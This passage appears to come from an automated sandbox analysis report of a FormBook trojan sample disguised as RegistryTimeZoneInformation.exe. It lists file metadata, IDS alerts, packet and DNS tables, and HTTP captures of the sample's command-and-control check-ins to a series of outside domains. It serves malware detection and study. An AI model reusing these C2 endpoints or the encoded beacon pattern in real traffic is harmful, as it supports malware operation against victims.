.rsrc	0x7e000	0x344e8	0x34600	False	0.0788148866348	data	1.84613555516	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb4000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x7e130	0x33428	dBase IV DBT, block length 6144, next free block index 40, next free block 4294967295, next used block 4294967295
RT_GROUP_ICON	0xb1558	0x14	data
RT_VERSION	0xb156c	0x36c	data
RT_MANIFEST	0xb18d8	0xc0f	XML 1.0 document, UTF-8 Unicode (with BOM) text

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018
Assembly Version	1.0.0.0
InternalName	RegistryTimeZoneInformation.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	RegisterVB
ProductVersion	1.0.0.0
FileDescription	RegisterVB
OriginalFilename	RegistryTimeZoneInformation.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-09:48:35.246251	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.3	50.116.112.43
02/23/21-09:48:35.246251	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.3	50.116.112.43
02/23/21-09:48:35.246251	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49736	80	192.168.2.3	50.116.112.43
02/23/21-09:48:54.032862	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49739	80	192.168.2.3	34.102.136.180
02/23/21-09:48:54.032862	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49739	80	192.168.2.3	34.102.136.180
02/23/21-09:48:54.032862	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49739	80	192.168.2.3	34.102.136.180
02/23/21-09:48:54.174190	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49739	34.102.136.180	192.168.2.3
02/23/21-09:49:37.345758	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.3	185.199.108.153
02/23/21-09:49:37.345758	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.3	185.199.108.153
02/23/21-09:49:37.345758	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.3	185.199.108.153
02/23/21-09:49:57.812186	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.3	176.74.27.137
02/23/21-09:49:57.812186	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.3	176.74.27.137
02/23/21-09:49:57.812186	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.3	176.74.27.137
02/23/21-09:50:39.257393	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49754	80	192.168.2.3	164.155.144.220
02/23/21-09:50:39.257393	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49754	80	192.168.2.3	164.155.144.220
02/23/21-09:50:39.257393	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49754	80	192.168.2.3	164.155.144.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 09:47:53.302598953 CET	49726	80	192.168.2.3	35.246.6.109
Feb 23, 2021 09:47:53.366753101 CET	80	49726	35.246.6.109	192.168.2.3
Feb 23, 2021 09:47:53.366893053 CET	49726	80	192.168.2.3	35.246.6.109
Feb 23, 2021 09:47:53.367204905 CET	49726	80	192.168.2.3	35.246.6.109
Feb 23, 2021 09:47:53.431372881 CET	80	49726	35.246.6.109	192.168.2.3
Feb 23, 2021 09:47:53.479753971 CET	80	49726	35.246.6.109	192.168.2.3
Feb 23, 2021 09:47:53.479780912 CET	80	49726	35.246.6.109	192.168.2.3
Feb 23, 2021 09:47:53.479994059 CET	49726	80	192.168.2.3	35.246.6.109
Feb 23, 2021 09:47:53.480159998 CET	49726	80	192.168.2.3	35.246.6.109
Feb 23, 2021 09:47:53.544548988 CET	80	49726	35.246.6.109	192.168.2.3
Feb 23, 2021 09:48:14.103236914 CET	49735	80	192.168.2.3	210.152.86.132
Feb 23, 2021 09:48:14.399669886 CET	80	49735	210.152.86.132	192.168.2.3
Feb 23, 2021 09:48:14.399941921 CET	49735	80	192.168.2.3	210.152.86.132
Feb 23, 2021 09:48:14.400055885 CET	49735	80	192.168.2.3	210.152.86.132
Feb 23, 2021 09:48:14.693931103 CET	80	49735	210.152.86.132	192.168.2.3
Feb 23, 2021 09:48:14.694118977 CET	80	49735	210.152.86.132	192.168.2.3
Feb 23, 2021 09:48:14.694143057 CET	80	49735	210.152.86.132	192.168.2.3
Feb 23, 2021 09:48:14.694588900 CET	49735	80	192.168.2.3	210.152.86.132
Feb 23, 2021 09:48:14.694619894 CET	49735	80	192.168.2.3	210.152.86.132
Feb 23, 2021 09:48:14.987210035 CET	80	49735	210.152.86.132	192.168.2.3
Feb 23, 2021 09:48:35.084038973 CET	49736	80	192.168.2.3	50.116.112.43
Feb 23, 2021 09:48:35.245834112 CET	80	49736	50.116.112.43	192.168.2.3
Feb 23, 2021 09:48:35.245968103 CET	49736	80	192.168.2.3	50.116.112.43
Feb 23, 2021 09:48:35.246251106 CET	49736	80	192.168.2.3	50.116.112.43
Feb 23, 2021 09:48:35.407773972 CET	80	49736	50.116.112.43	192.168.2.3
Feb 23, 2021 09:48:35.756676912 CET	49736	80	192.168.2.3	50.116.112.43
Feb 23, 2021 09:48:35.959105015 CET	80	49736	50.116.112.43	192.168.2.3
Feb 23, 2021 09:48:36.268591881 CET	80	49736	50.116.112.43	192.168.2.3
Feb 23, 2021 09:48:36.268627882 CET	80	49736	50.116.112.43	192.168.2.3
Feb 23, 2021 09:48:36.268660069 CET	49736	80	192.168.2.3	50.116.112.43
Feb 23, 2021 09:48:36.268686056 CET	49736	80	192.168.2.3	50.116.112.43
Feb 23, 2021 09:48:53.989866972 CET	49739	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:48:54.032433033 CET	80	49739	34.102.136.180	192.168.2.3
Feb 23, 2021 09:48:54.032671928 CET	49739	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:48:54.032861948 CET	49739	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:48:54.075917006 CET	80	49739	34.102.136.180	192.168.2.3
Feb 23, 2021 09:48:54.174190044 CET	80	49739	34.102.136.180	192.168.2.3
Feb 23, 2021 09:48:54.174376011 CET	80	49739	34.102.136.180	192.168.2.3
Feb 23, 2021 09:48:54.174551010 CET	49739	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:48:54.174585104 CET	49739	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:48:54.217343092 CET	80	49739	34.102.136.180	192.168.2.3
Feb 23, 2021 09:48:54.217567921 CET	80	49739	34.102.136.180	192.168.2.3
Feb 23, 2021 09:48:54.217709064 CET	49739	80	192.168.2.3	34.102.136.180
Feb 23, 2021 09:49:16.426949024 CET	49740	80	192.168.2.3	198.52.105.123
Feb 23, 2021 09:49:16.623905897 CET	80	49740	198.52.105.123	192.168.2.3
Feb 23, 2021 09:49:16.624052048 CET	49740	80	192.168.2.3	198.52.105.123
Feb 23, 2021 09:49:16.624357939 CET	49740	80	192.168.2.3	198.52.105.123
Feb 23, 2021 09:49:16.821913004 CET	80	49740	198.52.105.123	192.168.2.3
Feb 23, 2021 09:49:16.870922089 CET	80	49740	198.52.105.123	192.168.2.3
Feb 23, 2021 09:49:16.871021032 CET	80	49740	198.52.105.123	192.168.2.3
Feb 23, 2021 09:49:16.871046066 CET	80	49740	198.52.105.123	192.168.2.3
Feb 23, 2021 09:49:16.871067047 CET	80	49740	198.52.105.123	192.168.2.3
Feb 23, 2021 09:49:16.871087074 CET	80	49740	198.52.105.123	192.168.2.3
Feb 23, 2021 09:49:16.871104956 CET	80	49740	198.52.105.123	192.168.2.3
Feb 23, 2021 09:49:16.871181011 CET	49740	80	192.168.2.3	198.52.105.123
Feb 23, 2021 09:49:16.871262074 CET	49740	80	192.168.2.3	198.52.105.123
Feb 23, 2021 09:49:16.871350050 CET	49740	80	192.168.2.3	198.52.105.123
Feb 23, 2021 09:49:17.068207026 CET	80	49740	198.52.105.123	192.168.2.3
Feb 23, 2021 09:49:37.302115917 CET	49748	80	192.168.2.3	185.199.108.153
Feb 23, 2021 09:49:37.345478058 CET	80	49748	185.199.108.153	192.168.2.3
Feb 23, 2021 09:49:37.345629930 CET	49748	80	192.168.2.3	185.199.108.153
Feb 23, 2021 09:49:37.345757961 CET	49748	80	192.168.2.3	185.199.108.153
Feb 23, 2021 09:49:37.389106989 CET	80	49748	185.199.108.153	192.168.2.3
Feb 23, 2021 09:49:37.472671032 CET	80	49748	185.199.108.153	192.168.2.3
Feb 23, 2021 09:49:37.472696066 CET	80	49748	185.199.108.153	192.168.2.3
Feb 23, 2021 09:49:37.472858906 CET	49748	80	192.168.2.3	185.199.108.153
Feb 23, 2021 09:49:37.472898960 CET	49748	80	192.168.2.3	185.199.108.153
Feb 23, 2021 09:49:37.517864943 CET	80	49748	185.199.108.153	192.168.2.3
Feb 23, 2021 09:49:57.757414103 CET	49752	80	192.168.2.3	176.74.27.137
Feb 23, 2021 09:49:57.811839104 CET	80	49752	176.74.27.137	192.168.2.3
Feb 23, 2021 09:49:57.811960936 CET	49752	80	192.168.2.3	176.74.27.137
Feb 23, 2021 09:49:57.812186003 CET	49752	80	192.168.2.3	176.74.27.137
Feb 23, 2021 09:49:57.873881102 CET	80	49752	176.74.27.137	192.168.2.3
Feb 23, 2021 09:49:57.874310970 CET	49752	80	192.168.2.3	176.74.27.137
Feb 23, 2021 09:49:57.874418020 CET	49752	80	192.168.2.3	176.74.27.137
Feb 23, 2021 09:49:57.927423954 CET	80	49752	176.74.27.137	192.168.2.3
Feb 23, 2021 09:50:18.297434092 CET	49753	80	192.168.2.3	198.27.88.111
Feb 23, 2021 09:50:18.431996107 CET	80	49753	198.27.88.111	192.168.2.3
Feb 23, 2021 09:50:18.432109118 CET	49753	80	192.168.2.3	198.27.88.111
Feb 23, 2021 09:50:18.432307005 CET	49753	80	192.168.2.3	198.27.88.111
Feb 23, 2021 09:50:18.564835072 CET	80	49753	198.27.88.111	192.168.2.3
Feb 23, 2021 09:50:18.584054947 CET	80	49753	198.27.88.111	192.168.2.3
Feb 23, 2021 09:50:18.584095955 CET	80	49753	198.27.88.111	192.168.2.3
Feb 23, 2021 09:50:18.584261894 CET	49753	80	192.168.2.3	198.27.88.111
Feb 23, 2021 09:50:18.584335089 CET	49753	80	192.168.2.3	198.27.88.111
Feb 23, 2021 09:50:18.716856003 CET	80	49753	198.27.88.111	192.168.2.3
Feb 23, 2021 09:50:39.051729918 CET	49754	80	192.168.2.3	164.155.144.220
Feb 23, 2021 09:50:39.257086039 CET	80	49754	164.155.144.220	192.168.2.3
Feb 23, 2021 09:50:39.257184029 CET	49754	80	192.168.2.3	164.155.144.220
Feb 23, 2021 09:50:39.257392883 CET	49754	80	192.168.2.3	164.155.144.220
Feb 23, 2021 09:50:39.462497950 CET	80	49754	164.155.144.220	192.168.2.3
Feb 23, 2021 09:50:39.465549946 CET	80	49754	164.155.144.220	192.168.2.3
Feb 23, 2021 09:50:39.465570927 CET	80	49754	164.155.144.220	192.168.2.3
Feb 23, 2021 09:50:39.465783119 CET	49754	80	192.168.2.3	164.155.144.220
Feb 23, 2021 09:50:39.465820074 CET	49754	80	192.168.2.3	164.155.144.220
Feb 23, 2021 09:50:39.672122002 CET	80	49754	164.155.144.220	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 09:46:40.074162960 CET	50200	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:46:40.133456945 CET	53	50200	8.8.8.8	192.168.2.3
Feb 23, 2021 09:46:41.417691946 CET	51281	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:46:41.478061914 CET	53	51281	8.8.8.8	192.168.2.3
Feb 23, 2021 09:46:42.189471960 CET	49199	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:46:42.240940094 CET	53	49199	8.8.8.8	192.168.2.3
Feb 23, 2021 09:46:43.301377058 CET	50620	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:46:43.360296011 CET	53	50620	8.8.8.8	192.168.2.3
Feb 23, 2021 09:46:43.439152002 CET	64938	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:46:43.501475096 CET	53	64938	8.8.8.8	192.168.2.3
Feb 23, 2021 09:46:44.661849976 CET	60152	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:46:44.722966909 CET	53	60152	8.8.8.8	192.168.2.3
Feb 23, 2021 09:46:46.038443089 CET	57544	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:46:46.086977959 CET	53	57544	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:07.327891111 CET	55984	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:07.379460096 CET	53	55984	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:08.573640108 CET	64185	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:08.622617006 CET	53	64185	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:09.539221048 CET	65110	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:09.602024078 CET	53	65110	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:10.147272110 CET	58361	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:10.196006060 CET	53	58361	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:11.667907000 CET	63492	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:11.791357994 CET	53	63492	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:13.019293070 CET	60831	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:13.067945004 CET	53	60831	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:23.525736094 CET	60100	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:23.574409962 CET	53	60100	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:24.983030081 CET	53195	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:25.031742096 CET	53	53195	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:26.150157928 CET	50141	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:26.199599028 CET	53	50141	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:26.326800108 CET	53023	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:26.375427961 CET	53	53023	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:27.303738117 CET	49563	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:27.355180025 CET	53	49563	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:29.276165009 CET	51352	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:29.338347912 CET	53	51352	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:31.661143064 CET	59349	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:31.711962938 CET	53	59349	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:32.979504108 CET	57084	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:33.036781073 CET	53	57084	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:34.842191935 CET	58823	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:34.890940905 CET	53	58823	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:50.242492914 CET	57568	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:50.308706999 CET	53	57568	8.8.8.8	192.168.2.3
Feb 23, 2021 09:47:53.216571093 CET	50540	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:47:53.287456036 CET	53	50540	8.8.8.8	192.168.2.3
Feb 23, 2021 09:48:01.781652927 CET	54366	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:48:01.831094027 CET	53	54366	8.8.8.8	192.168.2.3
Feb 23, 2021 09:48:06.034183025 CET	53034	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:48:06.091228962 CET	53	53034	8.8.8.8	192.168.2.3
Feb 23, 2021 09:48:13.808693886 CET	57762	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:48:14.101805925 CET	53	57762	8.8.8.8	192.168.2.3
Feb 23, 2021 09:48:34.894269943 CET	55435	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:48:35.082828999 CET	53	55435	8.8.8.8	192.168.2.3
Feb 23, 2021 09:48:37.297516108 CET	50713	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:48:37.350575924 CET	53	50713	8.8.8.8	192.168.2.3
Feb 23, 2021 09:48:39.326778889 CET	56132	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:48:39.386740923 CET	53	56132	8.8.8.8	192.168.2.3
Feb 23, 2021 09:48:53.921508074 CET	58987	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:48:53.988495111 CET	53	58987	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:16.361803055 CET	56579	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:16.425479889 CET	53	56579	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:31.398925066 CET	60633	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:31.484190941 CET	53	60633	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:32.265213966 CET	61292	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:32.322531939 CET	53	61292	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:33.882205009 CET	63619	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:33.941507101 CET	53	63619	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:35.224967957 CET	64938	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:35.285001993 CET	53	64938	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:35.759891033 CET	61946	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:35.809756994 CET	53	61946	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:36.397238970 CET	64910	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:36.455867052 CET	53	64910	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:37.063218117 CET	52123	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:37.095645905 CET	56130	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:37.148777008 CET	53	56130	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:37.300690889 CET	53	52123	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:37.957732916 CET	56338	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:38.017211914 CET	53	56338	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:38.840532064 CET	59420	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:38.897531986 CET	53	59420	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:39.493510008 CET	58784	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:39.553536892 CET	53	58784	8.8.8.8	192.168.2.3
Feb 23, 2021 09:49:57.674310923 CET	63978	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:49:57.756051064 CET	53	63978	8.8.8.8	192.168.2.3
Feb 23, 2021 09:50:18.129417896 CET	62938	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:50:18.295779943 CET	53	62938	8.8.8.8	192.168.2.3
Feb 23, 2021 09:50:38.837822914 CET	55708	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:50:39.050357103 CET	53	55708	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 09:47:53.216571093 CET	192.168.2.3	8.8.8.8	0xaf8	Standard query (0)	www.kanaai.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:48:13.808693886 CET	192.168.2.3	8.8.8.8	0xa1fa	Standard query (0)	www.cvmjqcid.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:48:34.894269943 CET	192.168.2.3	8.8.8.8	0xa314	Standard query (0)	www.jaemagreci.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:48:53.921508074 CET	192.168.2.3	8.8.8.8	0xc403	Standard query (0)	www.sweetpopntreatz.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:49:16.361803055 CET	192.168.2.3	8.8.8.8	0x6197	Standard query (0)	www.long9000.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:49:37.063218117 CET	192.168.2.3	8.8.8.8	0xdf87	Standard query (0)	www.soheilvaseghi.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:49:57.674310923 CET	192.168.2.3	8.8.8.8	0xa100	Standard query (0)	www.gannahealing.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:50:18.129417896 CET	192.168.2.3	8.8.8.8	0xf04b	Standard query (0)	www.olgadalila.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:50:38.837822914 CET	192.168.2.3	8.8.8.8	0xcfd4	Standard query (0)	www.zomapa.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 23, 2021 09:47:53.287456036 CET	8.8.8.8	192.168.2.3	0xaf8	No error (0)	www.kanaai.com	www13.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:47:53.287456036 CET	8.8.8.8	192.168.2.3	0xaf8	No error (0)	www13.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:47:53.287456036 CET	8.8.8.8	192.168.2.3	0xaf8	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:47:53.287456036 CET	8.8.8.8	192.168.2.3	0xaf8	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-euw2-6-109.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:47:53.287456036 CET	8.8.8.8	192.168.2.3	0xaf8	No error (0)	td-balancer-euw2-6-109.wixdns.net		35.246.6.109	A (IP address)	IN (0x0001)
Feb 23, 2021 09:48:14.101805925 CET	8.8.8.8	192.168.2.3	0xa1fa	No error (0)	www.cvmjqcid.com	cvmjqcid.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:48:14.101805925 CET	8.8.8.8	192.168.2.3	0xa1fa	No error (0)	cvmjqcid.com		210.152.86.132	A (IP address)	IN (0x0001)
Feb 23, 2021 09:48:35.082828999 CET	8.8.8.8	192.168.2.3	0xa314	No error (0)	www.jaemagreci.com	jaemagreci.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:48:35.082828999 CET	8.8.8.8	192.168.2.3	0xa314	No error (0)	jaemagreci.com		50.116.112.43	A (IP address)	IN (0x0001)
Feb 23, 2021 09:48:53.988495111 CET	8.8.8.8	192.168.2.3	0xc403	No error (0)	www.sweetpopntreatz.com	sweetpopntreatz.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:48:53.988495111 CET	8.8.8.8	192.168.2.3	0xc403	No error (0)	sweetpopntreatz.com		34.102.136.180	A (IP address)	IN (0x0001)
Feb 23, 2021 09:49:16.425479889 CET	8.8.8.8	192.168.2.3	0x6197	No error (0)	www.long9000.com		198.52.105.123	A (IP address)	IN (0x0001)
Feb 23, 2021 09:49:37.300690889 CET	8.8.8.8	192.168.2.3	0xdf87	No error (0)	www.soheilvaseghi.com	vaseghi.github.io		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:49:37.300690889 CET	8.8.8.8	192.168.2.3	0xdf87	No error (0)	vaseghi.github.io		185.199.108.153	A (IP address)	IN (0x0001)
Feb 23, 2021 09:49:37.300690889 CET	8.8.8.8	192.168.2.3	0xdf87	No error (0)	vaseghi.github.io		185.199.111.153	A (IP address)	IN (0x0001)
Feb 23, 2021 09:49:37.300690889 CET	8.8.8.8	192.168.2.3	0xdf87	No error (0)	vaseghi.github.io		185.199.109.153	A (IP address)	IN (0x0001)
Feb 23, 2021 09:49:37.300690889 CET	8.8.8.8	192.168.2.3	0xdf87	No error (0)	vaseghi.github.io		185.199.110.153	A (IP address)	IN (0x0001)
Feb 23, 2021 09:49:57.756051064 CET	8.8.8.8	192.168.2.3	0xa100	No error (0)	www.gannahealing.com	gannahealing.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:49:57.756051064 CET	8.8.8.8	192.168.2.3	0xa100	No error (0)	gannahealing.com		176.74.27.137	A (IP address)	IN (0x0001)
Feb 23, 2021 09:50:18.295779943 CET	8.8.8.8	192.168.2.3	0xf04b	No error (0)	www.olgadalila.com	olgadalila.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:50:18.295779943 CET	8.8.8.8	192.168.2.3	0xf04b	No error (0)	olgadalila.com		198.27.88.111	A (IP address)	IN (0x0001)
Feb 23, 2021 09:50:39.050357103 CET	8.8.8.8	192.168.2.3	0xcfd4	No error (0)	www.zomapa.com		164.155.144.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.kanaai.com

www.cvmjqcid.com

www.jaemagreci.com

www.sweetpopntreatz.com

www.long9000.com

www.soheilvaseghi.com

www.gannahealing.com

www.olgadalila.com

www.zomapa.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49726	35.246.6.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:47:53.367204905 CET	1353	OUT	GET /blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.kanaai.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:47:53.479753971 CET	1354	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 23 Feb 2021 08:47:53 GMT Content-Length: 0 Connection: close location: https://www.kanaai.com/blr?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L strict-transport-security: max-age=120 x-wix-request-id: 1614070073.418552239871121903 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2 X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkViPPFLGwJgVO8FUAmFQQjPN,qquldgcFrj2n046g4RNSVPYxV603IO64T3vEIZzS9F0=,2d58ifebGbosy5xc+FRaluwwFBK7ql/Bn4PhplCINftSbYW2c4RZurCpWsQpzdtD3fKEXQvQlSAkB/lstal9R9ihGhmRXRA447Fw/kR9qdQ=,2UNV7KOq4oGjA5+PKsX47PP4j9yVJ2TZnllsg4qz4cE=,l7Ey5khejq81S7sxGe5Nk7KjdHHF98Vyi2aTDlfeOxdXz5t7NzGxeu2CXkk1aB7ZGlsroP2XR0N+rjgJK/PU9A==,4EmzKGKKpFffqfFwZRPY8dyCbNiRyM7+ZTNlULwu4/eFl6yP+RXtdTBOj4nQbF2lOOC/fp3nJ3UUnFruSOQYow== Cache-Control: no-cache Expires: -1 Server: Pepyaka/1.19.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49735	210.152.86.132	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:48:14.400055885 CET	5114	OUT	GET /blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.cvmjqcid.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:48:14.694118977 CET	5115	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.16.1 Date: Tue, 23 Feb 2021 08:48:14 GMT Content-Type: text/html Content-Length: 169 Connection: close Location: http://merukore.jp/blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49736	50.116.112.43	80	C:\Windows\explorer.exe

